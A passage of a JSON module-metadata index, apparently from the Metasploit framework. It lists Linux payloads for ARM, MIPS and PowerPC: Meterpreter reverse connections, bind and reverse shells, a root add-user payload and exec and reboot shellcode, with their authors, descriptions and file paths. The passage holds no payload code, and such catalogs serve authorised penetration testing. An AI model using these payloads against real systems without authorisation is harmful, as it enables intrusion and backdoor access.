"author": [
"Adam Cammack <adam_cammack@rapid7.com>",
"Brent Cook <brent_cook@rapid7.com>",
"timwr"
],
"description": "Run the Meterpreter / Mettle server payload (stageless)",
"references": [
],
"platform": "Linux",
"arch": "armbe",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2019-04-11 09:43:17 +0000",
"path": "/modules/payloads/singles/linux/armbe/meterpreter_reverse_https.rb",
"is_install_path": true,
"ref_name": "linux/armbe/meterpreter_reverse_https",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_linux/armbe/meterpreter_reverse_tcp": {
"name": "Linux Meterpreter, Reverse TCP Inline",
"full_name": "payload/linux/armbe/meterpreter_reverse_tcp",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"Adam Cammack <adam_cammack@rapid7.com>",
"Brent Cook <brent_cook@rapid7.com>",
"timwr"
],
"description": "Run the Meterpreter / Mettle server payload (stageless)",
"references": [
],
"platform": "Linux",
"arch": "armbe",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2019-04-11 09:43:17 +0000",
"path": "/modules/payloads/singles/linux/armbe/meterpreter_reverse_tcp.rb",
"is_install_path": true,
"ref_name": "linux/armbe/meterpreter_reverse_tcp",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_linux/armbe/shell_bind_tcp": {
"name": "Linux ARM Big Endian Command Shell, Bind TCP Inline",
"full_name": "payload/linux/armbe/shell_bind_tcp",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"Balazs Bucsay @xoreipeip <balazs.bucsay[-at-]rycon[-dot-]hu>"
],
"description": "Listen for a connection and spawn a command shell",
"references": [
],
"platform": "Linux",
"arch": "armbe",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2018-05-01 04:57:42 +0000",
"path": "/modules/payloads/singles/linux/armbe/shell_bind_tcp.rb",
"is_install_path": true,
"ref_name": "linux/armbe/shell_bind_tcp",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_linux/armle/adduser": {
"name": "Linux Add User",
"full_name": "payload/linux/armle/adduser",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"Jonathan Salwan"
],
"description": "Create a new user with UID 0",
"references": [
],
"platform": "Linux",
"arch": "armle",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/singles/linux/armle/adduser.rb",
"is_install_path": true,
"ref_name": "linux/armle/adduser",
"check": false,
"post_auth": true,
"default_credential": true,
"notes": {
}
},
"payload_linux/armle/exec": {
"name": "Linux Execute Command",
"full_name": "payload/linux/armle/exec",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"Jonathan Salwan"
],
"description": "Execute an arbitrary command",
"references": [
],
"platform": "Linux",
"arch": "armle",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/singles/linux/armle/exec.rb",
"is_install_path": true,
"ref_name": "linux/armle/exec",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_linux/armle/meterpreter/bind_tcp": {
"name": "Linux Meterpreter, Bind TCP Stager",
"full_name": "payload/linux/armle/meterpreter/bind_tcp",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"Adam Cammack <adam_cammack@rapid7.com>",
"nemo <nemo@felinemenace.org>"
],
"description": "Inject the mettle server payload (staged). Listen for a connection",
"references": [
],
"platform": "Linux",
"arch": "armle",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/stagers/linux/armle/bind_tcp.rb",
"is_install_path": true,
"ref_name": "linux/armle/meterpreter/bind_tcp",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_linux/armle/meterpreter/reverse_tcp": {
"name": "Linux Meterpreter, Reverse TCP Stager",
"full_name": "payload/linux/armle/meterpreter/reverse_tcp",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"Adam Cammack <adam_cammack@rapid7.com>",
"nemo <nemo@felinemenace.org>",
"tkmru"
],
"description": "Inject the mettle server payload (staged). Connect back to the attacker",
"references": [
],
"platform": "Linux",
"arch": "armle",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/stagers/linux/armle/reverse_tcp.rb",
"is_install_path": true,
"ref_name": "linux/armle/meterpreter/reverse_tcp",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_linux/armle/meterpreter_reverse_http": {
"name": "Linux Meterpreter, Reverse HTTP Inline",
"full_name": "payload/linux/armle/meterpreter_reverse_http",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"Adam Cammack <adam_cammack@rapid7.com>",
"Brent Cook <brent_cook@rapid7.com>",
"timwr"
],
"description": "Run the Meterpreter / Mettle server payload (stageless)",
"references": [
],
"platform": "Linux",
"arch": "armle",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2019-04-18 09:40:12 +0000",
"path": "/modules/payloads/singles/linux/armle/meterpreter_reverse_http.rb",
"is_install_path": true,
"ref_name": "linux/armle/meterpreter_reverse_http",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_linux/armle/meterpreter_reverse_https": {
"name": "Linux Meterpreter, Reverse HTTPS Inline",
"full_name": "payload/linux/armle/meterpreter_reverse_https",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"Adam Cammack <adam_cammack@rapid7.com>",
"Brent Cook <brent_cook@rapid7.com>",
"timwr"
],
"description": "Run the Meterpreter / Mettle server payload (stageless)",
"references": [
],
"platform": "Linux",
"arch": "armle",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2019-04-18 09:40:12 +0000",
"path": "/modules/payloads/singles/linux/armle/meterpreter_reverse_https.rb",
"is_install_path": true,
"ref_name": "linux/armle/meterpreter_reverse_https",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_linux/armle/meterpreter_reverse_tcp": {
"name": "Linux Meterpreter, Reverse TCP Inline",
"full_name": "payload/linux/armle/meterpreter_reverse_tcp",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"Adam Cammack <adam_cammack@rapid7.com>",
"Brent Cook <brent_cook@rapid7.com>",
"timwr"
],
"description": "Run the Meterpreter / Mettle server payload (stageless)",
"references": [
],
"platform": "Linux",
"arch": "armle",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2019-04-18 09:40:12 +0000",
"path": "/modules/payloads/singles/linux/armle/meterpreter_reverse_tcp.rb",
"is_install_path": true,
"ref_name": "linux/armle/meterpreter_reverse_tcp",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_linux/armle/shell/bind_tcp": {
"name": "Linux dup2 Command Shell, Bind TCP Stager",
"full_name": "payload/linux/armle/shell/bind_tcp",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"nemo <nemo@felinemenace.org>"
],
"description": "dup2 socket in r12, then execve. Listen for a connection",
"references": [
],
"platform": "Linux",
"arch": "armle",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/stagers/linux/armle/bind_tcp.rb",
"is_install_path": true,
"ref_name": "linux/armle/shell/bind_tcp",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_linux/armle/shell/reverse_tcp": {
"name": "Linux dup2 Command Shell, Reverse TCP Stager",
"full_name": "payload/linux/armle/shell/reverse_tcp",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"nemo <nemo@felinemenace.org>",
"tkmru"
],
"description": "dup2 socket in r12, then execve. Connect back to the attacker",
"references": [
],
"platform": "Linux",
"arch": "armle",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/stagers/linux/armle/reverse_tcp.rb",
"is_install_path": true,
"ref_name": "linux/armle/shell/reverse_tcp",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_linux/armle/shell_bind_tcp": {
"name": "Linux Command Shell, Reverse TCP Inline",
"full_name": "payload/linux/armle/shell_bind_tcp",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"civ",
"hal"
],
"description": "Connect to the target and spawn a command shell",
"references": [
],
"platform": "Linux",
"arch": "armle",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-08-21 12:25:27 +0000",
"path": "/modules/payloads/singles/linux/armle/shell_bind_tcp.rb",
"is_install_path": true,
"ref_name": "linux/armle/shell_bind_tcp",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_linux/armle/shell_reverse_tcp": {
"name": "Linux Command Shell, Reverse TCP Inline",
"full_name": "payload/linux/armle/shell_reverse_tcp",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"civ"
],
"description": "Connect back to the attacker and spawn a command shell",
"references": [
],
"platform": "Linux",
"arch": "armle",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-08-21 12:25:27 +0000",
"path": "/modules/payloads/singles/linux/armle/shell_reverse_tcp.rb",
"is_install_path": true,
"ref_name": "linux/armle/shell_reverse_tcp",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_linux/mips64/meterpreter_reverse_http": {
"name": "Linux Meterpreter, Reverse HTTP Inline",
"full_name": "payload/linux/mips64/meterpreter_reverse_http",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"Adam Cammack <adam_cammack@rapid7.com>",
"Brent Cook <brent_cook@rapid7.com>",
"timwr"
],
"description": "Run the Meterpreter / Mettle server payload (stageless)",
"references": [
],
"platform": "Linux",
"arch": "mips64",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2019-04-18 09:40:12 +0000",
"path": "/modules/payloads/singles/linux/mips64/meterpreter_reverse_http.rb",
"is_install_path": true,
"ref_name": "linux/mips64/meterpreter_reverse_http",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_linux/mips64/meterpreter_reverse_https": {
"name": "Linux Meterpreter, Reverse HTTPS Inline",
"full_name": "payload/linux/mips64/meterpreter_reverse_https",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"Adam Cammack <adam_cammack@rapid7.com>",
"Brent Cook <brent_cook@rapid7.com>",
"timwr"
],
"description": "Run the Meterpreter / Mettle server payload (stageless)",
"references": [
],
"platform": "Linux",
"arch": "mips64",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2019-04-18 09:40:12 +0000",
"path": "/modules/payloads/singles/linux/mips64/meterpreter_reverse_https.rb",
"is_install_path": true,
"ref_name": "linux/mips64/meterpreter_reverse_https",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_linux/mips64/meterpreter_reverse_tcp": {
"name": "Linux Meterpreter, Reverse TCP Inline",
"full_name": "payload/linux/mips64/meterpreter_reverse_tcp",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"Adam Cammack <adam_cammack@rapid7.com>",
"Brent Cook <brent_cook@rapid7.com>",
"timwr"
],
"description": "Run the Meterpreter / Mettle server payload (stageless)",
"references": [
],
"platform": "Linux",
"arch": "mips64",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2019-04-18 09:40:12 +0000",
"path": "/modules/payloads/singles/linux/mips64/meterpreter_reverse_tcp.rb",
"is_install_path": true,
"ref_name": "linux/mips64/meterpreter_reverse_tcp",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_linux/mipsbe/exec": {
"name": "Linux Execute Command",
"full_name": "payload/linux/mipsbe/exec",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"Michael Messner <devnull@s3cur1ty.de>",
"entropy <entropy@phiral.net>"
],
"description": "A very small shellcode for executing commands.\n This module is sometimes helpful for testing purposes.",
"references": [
"EDB-17940"
],
"platform": "Linux",
"arch": "mipsbe",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/singles/linux/mipsbe/exec.rb",
"is_install_path": true,
"ref_name": "linux/mipsbe/exec",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_linux/mipsbe/meterpreter/reverse_tcp": {
"name": "Linux Meterpreter, Reverse TCP Stager",
"full_name": "payload/linux/mipsbe/meterpreter/reverse_tcp",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"Adam Cammack <adam_cammack@rapid7.com>",
"juan vazquez <juan.vazquez@metasploit.com>",
"tkmru"
],
"description": "Inject the mettle server payload (staged). Connect back to the attacker",
"references": [
],
"platform": "Linux",
"arch": "mipsbe",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/stagers/linux/mipsbe/reverse_tcp.rb",
"is_install_path": true,
"ref_name": "linux/mipsbe/meterpreter/reverse_tcp",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_linux/mipsbe/meterpreter_reverse_http": {
"name": "Linux Meterpreter, Reverse HTTP Inline",
"full_name": "payload/linux/mipsbe/meterpreter_reverse_http",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"Adam Cammack <adam_cammack@rapid7.com>",
"Brent Cook <brent_cook@rapid7.com>",
"timwr"
],
"description": "Run the Meterpreter / Mettle server payload (stageless)",
"references": [
],
"platform": "Linux",
"arch": "mipsbe",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2019-04-18 09:40:12 +0000",
"path": "/modules/payloads/singles/linux/mipsbe/meterpreter_reverse_http.rb",
"is_install_path": true,
"ref_name": "linux/mipsbe/meterpreter_reverse_http",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_linux/mipsbe/meterpreter_reverse_https": {
"name": "Linux Meterpreter, Reverse HTTPS Inline",
"full_name": "payload/linux/mipsbe/meterpreter_reverse_https",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"Adam Cammack <adam_cammack@rapid7.com>",
"Brent Cook <brent_cook@rapid7.com>",
"timwr"
],
"description": "Run the Meterpreter / Mettle server payload (stageless)",
"references": [
],
"platform": "Linux",
"arch": "mipsbe",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2019-04-18 09:40:12 +0000",
"path": "/modules/payloads/singles/linux/mipsbe/meterpreter_reverse_https.rb",
"is_install_path": true,
"ref_name": "linux/mipsbe/meterpreter_reverse_https",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_linux/mipsbe/meterpreter_reverse_tcp": {
"name": "Linux Meterpreter, Reverse TCP Inline",
"full_name": "payload/linux/mipsbe/meterpreter_reverse_tcp",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"Adam Cammack <adam_cammack@rapid7.com>",
"Brent Cook <brent_cook@rapid7.com>",
"timwr"
],
"description": "Run the Meterpreter / Mettle server payload (stageless)",
"references": [
],
"platform": "Linux",
"arch": "mipsbe",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2019-04-18 09:40:12 +0000",
"path": "/modules/payloads/singles/linux/mipsbe/meterpreter_reverse_tcp.rb",
"is_install_path": true,
"ref_name": "linux/mipsbe/meterpreter_reverse_tcp",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_linux/mipsbe/reboot": {
"name": "Linux Reboot",
"full_name": "payload/linux/mipsbe/reboot",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"Michael Messner <devnull@s3cur1ty.de>",
"rigan - <imrigan@gmail.com>"
],
"description": "A very small shellcode for rebooting the system.\n This payload is sometimes helpful for testing purposes or executing\n other payloads that rely on initial startup procedures.",
"references": [
"URL-http://www.shell-storm.org/shellcode/files/shellcode-795.php"
],
"platform": "Linux",
"arch": "mipsbe",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/singles/linux/mipsbe/reboot.rb",
"is_install_path": true,
"ref_name": "linux/mipsbe/reboot",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_linux/mipsbe/shell/reverse_tcp": {
"name": "Linux Command Shell, Reverse TCP Stager",
"full_name": "payload/linux/mipsbe/shell/reverse_tcp",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"juan vazquez <juan.vazquez@metasploit.com>",
"tkmru"
],
"description": "Spawn a command shell (staged). Connect back to the attacker",
"references": [
],
"platform": "Linux",
"arch": "mipsbe",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/stagers/linux/mipsbe/reverse_tcp.rb",
"is_install_path": true,
"ref_name": "linux/mipsbe/shell/reverse_tcp",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_linux/mipsbe/shell_bind_tcp": {
"name": "Linux Command Shell, Bind TCP Inline",
"full_name": "payload/linux/mipsbe/shell_bind_tcp",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"scut",
"vaicebine",
"Vlatko Kosturjak",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "Listen for a connection and spawn a command shell",
"references": [
],
"platform": "Linux",
"arch": "mipsbe",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/singles/linux/mipsbe/shell_bind_tcp.rb",
"is_install_path": true,
"ref_name": "linux/mipsbe/shell_bind_tcp",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_linux/mipsbe/shell_reverse_tcp": {
"name": "Linux Command Shell, Reverse TCP Inline",
"full_name": "payload/linux/mipsbe/shell_reverse_tcp",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"rigan <imrigan@gmail.com>",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "Connect back to the attacker and spawn a command shell",
"references": [
"EDB-18226"
],
"platform": "Linux",
"arch": "mipsbe",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/singles/linux/mipsbe/shell_reverse_tcp.rb",
"is_install_path": true,
"ref_name": "linux/mipsbe/shell_reverse_tcp",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_linux/mipsle/exec": {
"name": "Linux Execute Command",
"full_name": "payload/linux/mipsle/exec",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"Michael Messner <devnull@s3cur1ty.de>",
"entropy <entropy@phiral.net>"
],
"description": "A very small shellcode for executing commands.\n This module is sometimes helpful for testing purposes as well as\n on targets with extremely limited buffer space.",
"references": [
"EDB-17940"
],
"platform": "Linux",
"arch": "mipsle",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/singles/linux/mipsle/exec.rb",
"is_install_path": true,
"ref_name": "linux/mipsle/exec",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_linux/mipsle/meterpreter/reverse_tcp": {
"name": "Linux Meterpreter, Reverse TCP Stager",
"full_name": "payload/linux/mipsle/meterpreter/reverse_tcp",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"Adam Cammack <adam_cammack@rapid7.com>",
"juan vazquez <juan.vazquez@metasploit.com>",
"tkmru"
],
"description": "Inject the mettle server payload (staged). Connect back to the attacker",
"references": [
],
"platform": "Linux",
"arch": "mipsle",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/stagers/linux/mipsle/reverse_tcp.rb",
"is_install_path": true,
"ref_name": "linux/mipsle/meterpreter/reverse_tcp",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_linux/mipsle/meterpreter_reverse_http": {
"name": "Linux Meterpreter, Reverse HTTP Inline",
"full_name": "payload/linux/mipsle/meterpreter_reverse_http",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"Adam Cammack <adam_cammack@rapid7.com>",
"Brent Cook <brent_cook@rapid7.com>",
"timwr"
],
"description": "Run the Meterpreter / Mettle server payload (stageless)",
"references": [
],
"platform": "Linux",
"arch": "mipsle",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2019-04-18 09:40:12 +0000",
"path": "/modules/payloads/singles/linux/mipsle/meterpreter_reverse_http.rb",
"is_install_path": true,
"ref_name": "linux/mipsle/meterpreter_reverse_http",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_linux/mipsle/meterpreter_reverse_https": {
"name": "Linux Meterpreter, Reverse HTTPS Inline",
"full_name": "payload/linux/mipsle/meterpreter_reverse_https",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"Adam Cammack <adam_cammack@rapid7.com>",
"Brent Cook <brent_cook@rapid7.com>",
"timwr"
],
"description": "Run the Meterpreter / Mettle server payload (stageless)",
"references": [
],
"platform": "Linux",
"arch": "mipsle",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2019-04-18 09:40:12 +0000",
"path": "/modules/payloads/singles/linux/mipsle/meterpreter_reverse_https.rb",
"is_install_path": true,
"ref_name": "linux/mipsle/meterpreter_reverse_https",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_linux/mipsle/meterpreter_reverse_tcp": {
"name": "Linux Meterpreter, Reverse TCP Inline",
"full_name": "payload/linux/mipsle/meterpreter_reverse_tcp",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"Adam Cammack <adam_cammack@rapid7.com>",
"Brent Cook <brent_cook@rapid7.com>",
"timwr"
],
"description": "Run the Meterpreter / Mettle server payload (stageless)",
"references": [
],
"platform": "Linux",
"arch": "mipsle",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2019-04-18 09:40:12 +0000",
"path": "/modules/payloads/singles/linux/mipsle/meterpreter_reverse_tcp.rb",
"is_install_path": true,
"ref_name": "linux/mipsle/meterpreter_reverse_tcp",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_linux/mipsle/reboot": {
"name": "Linux Reboot",
"full_name": "payload/linux/mipsle/reboot",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"Michael Messner <devnull@s3cur1ty.de>",
"rigan - <imrigan@gmail.com>"
],
"description": "A very small shellcode for rebooting the system.\n This payload is sometimes helpful for testing purposes.",
"references": [
"URL-http://www.shell-storm.org/shellcode/files/shellcode-795.php"
],
"platform": "Linux",
"arch": "mipsle",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/singles/linux/mipsle/reboot.rb",
"is_install_path": true,
"ref_name": "linux/mipsle/reboot",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_linux/mipsle/shell/reverse_tcp": {
"name": "Linux Command Shell, Reverse TCP Stager",
"full_name": "payload/linux/mipsle/shell/reverse_tcp",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"juan vazquez <juan.vazquez@metasploit.com>",
"tkmru"
],
"description": "Spawn a command shell (staged). Connect back to the attacker",
"references": [
],
"platform": "Linux",
"arch": "mipsle",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/stagers/linux/mipsle/reverse_tcp.rb",
"is_install_path": true,
"ref_name": "linux/mipsle/shell/reverse_tcp",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_linux/mipsle/shell_bind_tcp": {
"name": "Linux Command Shell, Bind TCP Inline",
"full_name": "payload/linux/mipsle/shell_bind_tcp",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"scut",
"vaicebine",
"Vlatko Kosturjak",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "Listen for a connection and spawn a command shell",
"references": [
],
"platform": "Linux",
"arch": "mipsle",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/singles/linux/mipsle/shell_bind_tcp.rb",
"is_install_path": true,
"ref_name": "linux/mipsle/shell_bind_tcp",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_linux/mipsle/shell_reverse_tcp": {
"name": "Linux Command Shell, Reverse TCP Inline",
"full_name": "payload/linux/mipsle/shell_reverse_tcp",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"rigan <imrigan@gmail.com>",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "Connect back to attacker and spawn a command shell",
"references": [
],
"platform": "Linux",
"arch": "mipsle",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2018-05-01 04:57:42 +0000",
"path": "/modules/payloads/singles/linux/mipsle/shell_reverse_tcp.rb",
"is_install_path": true,
"ref_name": "linux/mipsle/shell_reverse_tcp",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_linux/ppc/meterpreter_reverse_http": {
"name": "Linux Meterpreter, Reverse HTTP Inline",
"full_name": "payload/linux/ppc/meterpreter_reverse_http",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"Adam Cammack <adam_cammack@rapid7.com>",
"Brent Cook <brent_cook@rapid7.com>",
"timwr"
],
"description": "Run the Meterpreter / Mettle server payload (stageless)",
"references": [
],
"platform": "Linux",
"arch": "ppc",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2019-04-11 09:43:17 +0000",
"path": "/modules/payloads/singles/linux/ppc/meterpreter_reverse_http.rb",
"is_install_path": true,
"ref_name": "linux/ppc/meterpreter_reverse_http",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_linux/ppc/meterpreter_reverse_https": {
"name": "Linux Meterpreter, Reverse HTTPS Inline",
"full_name": "payload/linux/ppc/meterpreter_reverse_https",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"Adam Cammack <adam_cammack@rapid7.com>",
"Brent Cook <brent_cook@rapid7.com>",
"timwr"
],
"description": "Run the Meterpreter / Mettle server payload (stageless)",
"references": [
],
"platform": "Linux",
"arch": "ppc",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2019-04-11 09:43:17 +0000",
"path": "/modules/payloads/singles/linux/ppc/meterpreter_reverse_https.rb",
"is_install_path": true,
"ref_name": "linux/ppc/meterpreter_reverse_https",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_linux/ppc/meterpreter_reverse_tcp": {
"name": "Linux Meterpreter, Reverse TCP Inline",
"full_name": "payload/linux/ppc/meterpreter_reverse_tcp",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"Adam Cammack <adam_cammack@rapid7.com>",
"Brent Cook <brent_cook@rapid7.com>",
"timwr"
],
"description": "Run the Meterpreter / Mettle server payload (stageless)",
"references": [
],
"platform": "Linux",
"arch": "ppc",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2019-04-11 09:43:17 +0000",
"path": "/modules/payloads/singles/linux/ppc/meterpreter_reverse_tcp.rb",
"is_install_path": true,
"ref_name": "linux/ppc/meterpreter_reverse_tcp",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_linux/ppc/shell_bind_tcp": {
"name": "Linux Command Shell, Bind TCP Inline",
"full_name": "payload/linux/ppc/shell_bind_tcp",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"Ramon de C Valle <rcvalle@metasploit.com>"
],
"description": "Listen for a connection and spawn a command shell",
"references": [
],
"platform": "Linux",
"arch": "ppc, cbea",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2018-05-01 04:57:42 +0000",
"path": "/modules/payloads/singles/linux/ppc/shell_bind_tcp.rb",
"is_install_path": true,
"ref_name": "linux/ppc/shell_bind_tcp",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_linux/ppc/shell_find_port": {
"name": "Linux Command Shell, Find Port Inline",
"full_name": "payload/linux/ppc/shell_find_port",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"Ramon de C Valle <rcvalle@metasploit.com>"
],
"description": "Spawn a shell on an established connection",
"references": [
],
"platform": "Linux",
"arch": "ppc, cbea",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2018-05-01 04:57:42 +0000",
